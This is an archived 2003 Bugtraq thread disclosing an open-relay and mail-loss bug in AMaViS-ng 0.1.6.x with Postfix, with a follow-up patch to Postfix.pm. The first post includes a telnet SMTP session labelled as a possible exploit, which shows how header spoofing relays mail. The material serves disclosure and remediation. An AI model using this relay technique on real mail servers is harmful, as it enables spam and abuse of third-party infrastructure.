98077 2003-04-08 18:38 /62 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org> Importerad: 2003-04-08 18:38 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <4413> Ärende: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss ------------------------------------------------------------ Hi everyone - with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:". Possible exploit: --%snip%-- #> telnet somemx.domain.tld 25 (220 somemx.domain.tld ESMTP Postfix) helo amavis-ng (250 somemx.domain.tld) mail from:userX@domainX.tld (250 ok) rcpt to:userY@domain.tld (250 ok) data (354 End data with <CR><LF>.<CR><LF>) From: userX@domainX.tld To: userZ@domainZ.tld Subject: AMaViS-ng 0.1.6.x bug . (250 Ok: queued as ...) quit (221 Bye) --%snip%-- Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userY@domain.tld. What does it to: userX@domainX.tld is sending an email to userY@domain.tld. The header of this email contains "To: userZ@domain.tld". AMaViS-ng seems to parse the header and forwards the email to userZ@domain.tld. userY@domain.tld does not get this email. As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way. configuration files (relevant parts): # $postfix/master.cf smtp inet n - n - - smtpd -o content_filter=filter: filter unix - n n - - pipe flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient} # end of master.cf # $amavis-ng/amavis.conf [global] mail-transfer-agent = Postfix [Postfix] postfix = /usr/sbin/sendmail args = -i -f # end of amavis.conf There is no problem with AMaViS == 0.1.4.x Kind regards, Phil Cyc (98077) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten) 98298 2003-04-10 06:46 /12 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org> Importerad: 2003-04-10 06:46 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <4437> Kommentar till text 98077 av Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org> Ärende: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss ------------------------------------------------------------ Hi - As long as the problem is not fixed by the AMaViS-ng maintainers, this patch could be helpful. I took the relevant part from the version 0.1.4.1 source. This patch (attachment) applies to 0.1.6.3. Kind regards, Phil Cyc (98298) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten) Bilaga (text/x-diff) i text 98299 98299 2003-04-10 06:46 /32 rader/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org> Bilagans filnamn: "postfix.patch" Importerad: 2003-04-10 06:46 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <4438> Bilaga (text/plain) till text 98298 Ärende: Bilaga (postfix.patch) till: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss ------------------------------------------------------------ diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm --- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm Tue Mar 18 00:04:21 2003 +++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm Tue Apr 8 23:28:09 2003 @@ -112,22 +112,11 @@ writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV)); - while (shift @ARGV) { - /^-f$/ && next; # ignore "-f" - /^-d$/ && next; # ignore "-d" - s/^(.*)$/$1/; # untaint sender or recipient - if (not defined $$args{'sender'}) { - if (/^$/) { - $$args{'sender'} = "<>"; - } - else { - $$args{'sender'} = $_; - } - } - else { - push @{$$args{'recipients'}}, $_; - } - } + shift @ARGV if $ARGV[0] eq "-f"; + $$args{'sender'} = shift @ARGV; + $$args{'sender'} = "<>" if (!$$args{'sender'}); + shift @ARGV if $ARGV[0] eq "-d"; + push @{$$args{'recipients'}}, @ARGV; # Message file has been written, reset file pointer and put it into # the record. (98299) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Ombruten)